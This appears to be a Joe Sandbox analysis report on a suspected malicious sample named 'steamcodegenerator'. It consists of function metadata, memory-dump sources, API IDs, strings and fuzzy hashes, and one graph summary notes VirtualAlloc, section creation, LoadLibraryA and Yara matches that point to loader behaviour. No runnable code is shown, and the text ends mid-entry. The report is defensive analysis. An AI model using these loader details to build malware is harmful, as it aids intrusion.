                                                                        • Opcode ID: d1d0374af1531000f124c1798acd8703a075724bd8eabcca79cb574d2685e6b7
                                                                        • Instruction ID: 89102133c67ab82854caf1ffe5532a1d8a71d4222b238106eab94628c94cccea
                                                                        • Opcode Fuzzy Hash: d1d0374af1531000f124c1798acd8703a075724bd8eabcca79cb574d2685e6b7
                                                                        • Instruction Fuzzy Hash: 25311521A0C283C1FA58AB6695533B963B1AF85784F445038EA4EEF3E7DE2DF814C341

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: FileHandleType
                                                                        • String ID:
                                                                        • API String ID: 3000768030-0
                                                                        • Opcode ID: 080277b50c5276ac360943eb1b1c156bec9c5cf942e338d9d9fe34af66a790ff
                                                                        • Instruction ID: 7fb30ef1a6a770e04211eb73f293b00ca59873c0d0d05a7defbbad482b99c966
                                                                        • Opcode Fuzzy Hash: 080277b50c5276ac360943eb1b1c156bec9c5cf942e338d9d9fe34af66a790ff
                                                                        • Instruction Fuzzy Hash: EE31C532A28B46D2EB618B1585911787670FB45BB0F641739DB6EAB3E0CF38F4A1C350

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                        • String ID:
                                                                        • API String ID: 1173176844-0
                                                                        • Opcode ID: 44696b21bd67145d8e0760ec95888dcbd043158a58de3966fd1fe4f79ebb6704
                                                                        • Instruction ID: 938c4c1f96f4a16acec81b8396cca89ae6551491570624f576198917d2568126
                                                                        • Opcode Fuzzy Hash: 44696b21bd67145d8e0760ec95888dcbd043158a58de3966fd1fe4f79ebb6704
                                                                        • Instruction Fuzzy Hash: 95F03A11E1A606C1FE2D666614072B501604F18370E180630DE7CAF7D3EE2EB4B58291

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629964375.0000022AF4E51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000022AF4E51000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e51000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Exec
                                                                        • String ID:
                                                                        • API String ID: 459137531-0
                                                                        • Opcode ID: 1ce1e83e12cea887f5631db8c3beb4c8b375af077da88e97cfda06e046574df1
                                                                        • Instruction ID: efc94ce1ca0e1e85637900c4ec84d01a9e382cb6c54f0ea10dbbe69257485c32
                                                                        • Opcode Fuzzy Hash: 1ce1e83e12cea887f5631db8c3beb4c8b375af077da88e97cfda06e046574df1
                                                                        • Instruction Fuzzy Hash: 14318431204D084FEB48FF74DD5DBAA77A6E798301F00853A950BC7665DA7DCA05CB41

                                                                        Control-flow Graph

                                                                        Graph summary (node/edge listing of the rendered graph condensed): entry 22af4e179f8-22af4e17a0e calls VirtualAlloc; the body 22af4e17a3c-22af4e17d69 chains internal calls (22af4e199bb, 22af4e199db, 22af4e1943b, 22af4e195ef, 22af4e194af, 22af4e16ab7, 22af4e168fb, 22af4e16a27, 22af4e1819f, 22af4e1771f, 22af4e171af, 22af4e17d6f, 22af4e18c53, 22af4e1973f); block 22af4e17aed-22af4e17b05 calls 22af4e191ab, the LoadLibraryA routine graphed above.
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022AF4E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e10000_steamcodegenerator.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocCreateSectionVirtual
                                                                        • String ID:
                                                                        • API String ID: 1590197315-0
                                                                        • Opcode ID: eb4d697b95cde0fb80402334880357f1ef1fd47815b20976dc2f64c6329480eb
                                                                        • Instruction ID: 66f182a7c7571d9a61b3a0ea4555a767a1dbaf515bb9618706b2eccc306aef4a
                                                                        • Opcode Fuzzy Hash: eb4d697b95cde0fb80402334880357f1ef1fd47815b20976dc2f64c6329480eb
                                                                        • Instruction Fuzzy Hash: B9B1F7303549055BEB69DA68C5887EBB3D1FBC8700F140169D54AC3982EB2EE952CE83

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6635490E4
                                                                          • Part of subcall function 00007FF66354AE30: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF66354AE38
                                                                          • Part of subcall function 00007FF66354AE30: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF66354AE3D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                        • String ID:
                                                                        • API String ID: 1208906642-0
                                                                        • Opcode ID: 474fc897f0be47f68d46e62fd6981f481194b323a22c8996711b27343b9b6b83
                                                                        • Instruction ID: ab4b8f37921049d3dadbf3cd551d987732db1c0aca2a0c0d4de58851d099ed05
                                                                        • Opcode Fuzzy Hash: 474fc897f0be47f68d46e62fd6981f481194b323a22c8996711b27343b9b6b83
                                                                        • Instruction Fuzzy Hash: D5E0BD20E2D283C0FEAC262113072B906B01F22349F405078E85EFF3839E0E36765222

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF66355F7B1,?,?,00000000,00007FF663564803,?,?,?,00007FF663557CF3,?,?,?,00007FF663557BE9), ref: 00007FF663558B6E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 4292702814-0
                                                                        • Opcode ID: bd55b1ea0fc155a6d1c409fefb9d932666b1c806ec432e723f80dda1b82eeeb6
                                                                        • Instruction ID: 77f06f87dff7bb763c0fa1be9674a5d89df1adc08da76f4a3cc805b8f86322c2
                                                                        • Opcode Fuzzy Hash: bd55b1ea0fc155a6d1c409fefb9d932666b1c806ec432e723f80dda1b82eeeb6
                                                                        • Instruction Fuzzy Hash: 1FF058A1F29746C5FA6426A2588327431B84F847B0F0C4A30D93EEF3D2DE2CB4404711
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID: s$s$,
                                                                        • API String ID: 3215553584-728586918
                                                                        • Opcode ID: 06cdfdd089d7f53002eee445f53705af94493326fe36f7a161390db78508ff4b
                                                                        • Instruction ID: 7d7164af15473993dbf3af6ce78a060b9e5a4f90c6fe5a2827e76a8b5351ebc6
                                                                        • Opcode Fuzzy Hash: 06cdfdd089d7f53002eee445f53705af94493326fe36f7a161390db78508ff4b
                                                                        • Instruction Fuzzy Hash: 6AA2F172B18282CBE7248E66D4427FC37B1FB55788F505535DA0AAFB95DF38AA00CB40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                        • String ID: utf8
                                                                        • API String ID: 3069159798-905460609
                                                                        • Opcode ID: d4b3ff6ab2fd706453dd6c794e4175711012dd38f10e3c9d27665adbabbc73f4
                                                                        • Instruction ID: faaf3df6ff013abf0e4d628c6ba3c6916d7146ea831463230184bfc4619a0357
                                                                        • Opcode Fuzzy Hash: d4b3ff6ab2fd706453dd6c794e4175711012dd38f10e3c9d27665adbabbc73f4
                                                                        • Instruction Fuzzy Hash: 84918C32B08742C6EB24AF22D9422B963B4EF46B80F454135DA4DAB7B6DF3DE955C340
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                        • String ID:
                                                                        • API String ID: 2591520935-0
                                                                        • Opcode ID: 9965b17ae3c4a17e3d0caa9ea39aea03ad22011a5320ec8fc02cfc6467b481ea
                                                                        • Instruction ID: e2ce7bf85bdb2070c59ed0fcb70d3d38a893e4068297cad81bc644bca21dcfa3
                                                                        • Opcode Fuzzy Hash: 9965b17ae3c4a17e3d0caa9ea39aea03ad22011a5320ec8fc02cfc6467b481ea
                                                                        • Instruction Fuzzy Hash: F6717DB2F18642CAFB519F62D8626BD23B4BF46744F444135CA0DAB7A5EF3CA445C390
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                        • String ID:
                                                                        • API String ID: 3140674995-0
                                                                        • Opcode ID: 98028c3c7c245ce19bddfd2eddf14e9f2f0bacc6a8fa3fd2ff093612927a1805
                                                                        • Instruction ID: 7e480425bca8bd724050d53f4c31735c7e6727ba6155bc1e255bac78acd69230
                                                                        • Opcode Fuzzy Hash: 98028c3c7c245ce19bddfd2eddf14e9f2f0bacc6a8fa3fd2ff093612927a1805
                                                                        • Instruction Fuzzy Hash: 7E314C72608B81C6EB649F62E8413ED73B0FB85754F04403ADA4E9BB99EF38D548C710
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                        • String ID:
                                                                        • API String ID: 1239891234-0
                                                                        • Opcode ID: 8912553d44b3abefc55f9a8b3a26313e64a573415501656d81ef5f530cc03b7e
                                                                        • Instruction ID: ed05809610c7604cd59a1c5fd38d68a31d3560623c9cf61532107b31542aed43
                                                                        • Opcode Fuzzy Hash: 8912553d44b3abefc55f9a8b3a26313e64a573415501656d81ef5f530cc03b7e
                                                                        • Instruction Fuzzy Hash: 00318E36608F81C6DB60DF25E8412AE77B0FB89764F400135EA9D97B65DF38D155CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                        • String ID: %$+
                                                                        • API String ID: 3668304517-2626897407
                                                                        • Opcode ID: 269d37533fdaf201db9261dc3333217303a5f80c2e6368c3b5d31c85d833f6b3
                                                                        • Instruction ID: 3db07df3b28ffbb761da1e23f136007701d8720b5556fe52907c3418695e30b9
                                                                        • Opcode Fuzzy Hash: 269d37533fdaf201db9261dc3333217303a5f80c2e6368c3b5d31c85d833f6b3
                                                                        • Instruction Fuzzy Hash: 60123422B18681CAFB28CB65D8423FD6371AB55788F444131DE4DABB9ADF3CE565C300
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                        • String ID:
                                                                        • API String ID: 2933794660-0
                                                                        • Opcode ID: cabce6d9e3ae1a9f9b79acc04b8ec2d00ffbc707921c0ad921e752880e15d35e
                                                                        • Instruction ID: ff304e01ce83314a87cdb20be244b4c5083aa8c57962569ab58408ac636683ae
                                                                        • Opcode Fuzzy Hash: cabce6d9e3ae1a9f9b79acc04b8ec2d00ffbc707921c0ad921e752880e15d35e
                                                                        • Instruction Fuzzy Hash: A7111F22B14F06C9EB00DF61E8562A933B4F759758F440931EA6D97764DF78D1548340
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                        • API String ID: 3215553584-2761157908
                                                                        • Opcode ID: b2729346d47deeb60f377ee9dc525e25925e1ea60ab6d02c77dc29d9f41ed541
                                                                        • Instruction ID: 354569c4c8186f84818df684c5b5acd4bb155f0a4c05f6d96b8241ad26e926c0
                                                                        • Opcode Fuzzy Hash: b2729346d47deeb60f377ee9dc525e25925e1ea60ab6d02c77dc29d9f41ed541
                                                                        • Instruction Fuzzy Hash: 4E7103B2E18242CAE7258F66D4527BD66B1AB82794F004635DA1DEFBD5DE3CF9408B00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 1502251526-0
                                                                        • Opcode ID: a3a34dc7f104a5757306e0e4006adbba08ef9a00a3e13a0073f806107d450ba3
                                                                        • Instruction ID: 9cab9932bcc3373fa5fcbf709fdcc525b03dcc35a2359ff31f6655459e01af5e
                                                                        • Opcode Fuzzy Hash: a3a34dc7f104a5757306e0e4006adbba08ef9a00a3e13a0073f806107d450ba3
                                                                        • Instruction Fuzzy Hash: CEC1E3B2B18286C7EB248F19E04566AB7B1F784BA4F468134DB4A9B744DF3DF811CB40
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 1791019856-0
                                                                        • Opcode ID: 4fcf00f24d458d487f226e0140c30a747feae87a0b699733a31c15bd732d9dab
                                                                        • Instruction ID: 8f33312c174ea9138918b28179886efe106a5c8f2c2aae455c8b626b321b1371
                                                                        • Opcode Fuzzy Hash: 4fcf00f24d458d487f226e0140c30a747feae87a0b699733a31c15bd732d9dab
                                                                        • Instruction Fuzzy Hash: AC6180B2A08682CAEB349F12D5622B973B1FB95750F048135CB5EEB7A1DE3CE495C700
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -$e+000$gfff
                                                                        • API String ID: 0-2620144452
                                                                        • Opcode ID: 798b48c96635f930ac666b1b5a48e237ac275f191e21e12dc5bb9441e7330c16
                                                                        • Instruction ID: bab8618ff5d6b0e53da6e8d78e1ad5a702c4bb7b50c5c59f86044478b1f3b435
                                                                        • Opcode Fuzzy Hash: 798b48c96635f930ac666b1b5a48e237ac275f191e21e12dc5bb9441e7330c16
                                                                        • Instruction Fuzzy Hash: 0A5158B2B182D586E7648E35D8067697BA1E785BA4F488231CBAC9FBD1DF3DE440C701
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID: GetLocaleInfoEx
                                                                        • API String ID: 2299586839-2904428671
                                                                        • Opcode ID: 415bcb294c056d98af3462750d7d188cc4b1afdd892eeae8a2ee088bcffb3ecf
                                                                        • Instruction ID: 464c361d8b242e019a75c800d554d7e461c7368b423b11eca8e016924ad658de
                                                                        • Opcode Fuzzy Hash: 415bcb294c056d98af3462750d7d188cc4b1afdd892eeae8a2ee088bcffb3ecf
                                                                        • Instruction Fuzzy Hash: 4201A720B08A81C5E7409B47B8050AAB3B0EF85BD0F548036EE5DBBB65CE3CF5418340
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Info
                                                                        • String ID:
                                                                        • API String ID: 1807457897-0
                                                                        • Opcode ID: 5941f4e66f4a4ae4ea8d9f2ce51bef13bf4df362b0d1e962feb6320bd1209b36
                                                                        • Instruction ID: 989953ef61efd0282c08b3a2f9b4a33deca3e31760f86b11cde2802b8f92e0c8
                                                                        • Opcode Fuzzy Hash: 5941f4e66f4a4ae4ea8d9f2ce51bef13bf4df362b0d1e962feb6320bd1209b36
                                                                        • Instruction Fuzzy Hash: 84128872A08BC1C6E751CF2894462F973A4FB69758F059235EE9D9B792EF38E194C300
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ce188c6723de416a60445d936ccf2b71249bd4acdd477d6696f92839183b5057
                                                                        • Instruction ID: 94a7371d687d6e033f12f7def6ff9044cca38949486d08126727ee8082b2b551
                                                                        • Opcode Fuzzy Hash: ce188c6723de416a60445d936ccf2b71249bd4acdd477d6696f92839183b5057
                                                                        • Instruction Fuzzy Hash: 29E14F32A04B81C6E720DB61E4416EE67B4FB95798F404635DF8EA7B56EF78E245C300
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f8fdce93d0982d34daabacb749a03f63f2871ed28a5675a9677f348b7d655c88
                                                                        • Instruction ID: ef5b2eda8ae6a2087b0053ac83a7085df0af259060de205dcf4d2f47e0569417
                                                                        • Opcode Fuzzy Hash: f8fdce93d0982d34daabacb749a03f63f2871ed28a5675a9677f348b7d655c88
                                                                        • Instruction Fuzzy Hash: 0C51B222B08691C5FB209B72A8455AE7BB1FB457A4F144235EE5DBBBA9DE3CD401C700
                                                                        APIs
                                                                        Memory Dump Source
